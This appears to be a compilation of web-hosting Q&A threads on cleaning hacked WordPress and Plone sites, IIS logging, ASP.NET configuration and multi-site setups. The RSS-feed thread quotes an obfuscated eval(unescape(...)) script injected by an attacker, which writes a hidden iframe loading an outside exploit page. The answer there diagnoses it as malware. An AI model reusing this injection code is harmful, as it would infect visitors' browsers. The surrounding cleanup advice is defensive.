For a few days now my wordpress website has a virus.
The website is unresponsive, I get error 500 when trying to access it.
The admin panel has a popup window written in russian :
http://imghost.in/images/2018/08/27/22f42129593820fa959655c622c426d0.png
how can I remove it and get my website back?
Any help will be appreciated!
So just to sum up things,
Firstly, if it has been infected for a few days, try ask your provider for a rollback/backup. Most providers keep a backup of 7 days by default (can be longer depending on your subscription type and added security). I would recommend to keep backups yourself in the future. Even the database.
If the provider cannot provide a backup prior to the infection, try see if they can do a scan and tell you exactly what files are infected. This will speed up the debugging process. What you will be looking for are entire folders that are "out-of-place" and have random generated names like "qwewyeg". Delete all of those folders. Infected files will usually contain a class or a class extent that makes an external call. They are usually planted in the beginning of an infected file and also have randomly generated class names like "qdhjsahd" etc. Delete those sections.
Once all infections have been removed, change all of your passwords and set FTP to SFTP. Update your WordPress as well as its themes and plug-ins.
When you've done all that, you should be fine.
Related
I am new to IIS, honestly I've only been on it a few times, but I have a new requirement to track the number of times people access links within certain folders (our website is basically a set of pages that use IIS Directory Browsing to make files available), and then build a report for each of the "watched" directories that shows number of accesses and date last accessed.
What I'm thinking of is writing some code that parses an IIS7 log or report that looks for the specific folders, and then uses a counter to find number of times accessed and the last time accessed. My question is, does IIS7 provide a built-in utility to build the data of when links are accessed? It's fine if you can't tell it to watch certain links but instead record all traffic, the parser can look for certain strings to find the folder accesses needed.
I can't use any 3rd party solutions, just what is native to IIS7.
Thanks in advance!
If you want a tool that already does that there are plenty out there such as AWStats http://awstats.sourceforge.net/ or you could also just use LogParser to parse the logs easily and produce reports based on that http://blogs.msdn.com/b/carlosag/archive/2010/03/25/analyze-your-iis-log-files-favorite-log-parser-queries.aspx
I have been given a job to re-develop a news portal. The website already has couple of thousands of unique visits a day. I am going to develop it using ASP.NET webforms. I am currently in the planning phase and I am thinking to offer the main admin a page where he can change site specific configuration information. Some of these are;
Web site title "<title>"
site URL
footer text
default image directory
whether to accept comments without authorisation or not
I listed above some settings so that you can understand my scenario better.
What I can't decide is, where to store all this information. Do I store them in a DB (costly?), a custom XML file? or a .config file. e.g. ConfigurationManager.AppSettings
Any pros or cons would make my day!
Thank you!
My opinion is to store them on web.config on WebConfigurationManager.OpenWebConfiguration().GetSection() because this variables are critical and change only ones - in the initialize of the site.
For example the default image directory is stay the same for the rest of the site life, the same and the site URL the same and the other.
Also when you change this settings probably you need also a restart of the web application because for sure you need to re-read them on some static variables.
And because this variables are stay as is, and need them for start the web (then you read the database and the rest) you need to have it in first hand, from the web.config.
I ran into some trouble modifying my product and reinstalling it, so I tried installing the version I know works on my live site.
Still no love, just an error message I can't decipher which seems to contain spam! Any suggestions as to how I can diagnose this or where to seek help?
This pastie has the error, truncated due to size:
http://www.pastie.org/2715995
Come to think of it I did see an unidentified user listed at one stage...
Thanks!
Most likely, your site has been compromised by an automated script exploiting CVE-2011-2528. The script adds accounts, changes passwords of existing accounts, and customizes your main_template macro.
In order to clean this up, you need to:
Install the Plone Hotfix.
Reset your session secrets to prevent reuse of old session cookies the attacker may still have.
Audit the accounts present, removing any you do not know, especially if they Administrator access.
Clean up your main_template macro. If you never customized it through the web, simply delete it from your portal_sites/custom folder (go to the ZMI, select portal_sites, select custom, and delete), otherwise edit it and remove the hidden links at the bottom.
My feed is broken: Feed Validator says this portion is the problem. Any thoughts?
]]>content:encoded>
wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss>
slash:comments>2/slash:comments>
/item>
/channel>
/rss>
script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
<script language="javascript">eval(unescape("%64%6F%63...
You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.
You need to get the site off-line before it infects more people, then work on the clean-up, which will depend on how they compromised it/what kind of server it is. Certainly at the very least you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your your own [virtual] server you will need to check that the server itself hasn't been rooted.
(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)
Is it possible or feasible to run a bunch off web sites off of only 1 code base?
For example I have 1 site that bases it's connection string off of the domain name or subdomain name. So, depending on what domain/subdomain is hitting the site the site returns content that is stored in a database specifically for that site.
What types of issues might occur from doing this? Specifically if doing this with asp.net.
It's quite acceptable.
Just note that anyone can change the domain name that you may pick up (as long as you've configured a host header for it), so just make sure you don't go around making something like 'admin.foo' but relying only on that for security (you'd be mad though, obviously).
I see no problem with it.
It works and is proven. Se DotNetNuke for just 1 example of this.
Request come in. Regex/character matchthe domain name. Load settings for that domain (base path to images, css, config, pages etc etc) and off you go.
The gotcha to look out for is if your application is both a) storing data in memory and b) using the same application space. So if, for example, you want to dish up two different blogs and you want the data to be resident in memory (if, say, your back-end store was XML and you didn't want to parse XML with every request) then you'll have to make sure that Asp.Net sees each call as a separate application (which can both point to the same file-system folder and thus uses the same files).
I ran into this exact situation when coding a multi-blog data provider for BlogEngine.Net. It uses a single code base to serve up different blogs based on the requested URL. However, since BlogEngine.Net carries its data in memory, the data provider won't work unless IIS is configured so that each blog is its own application.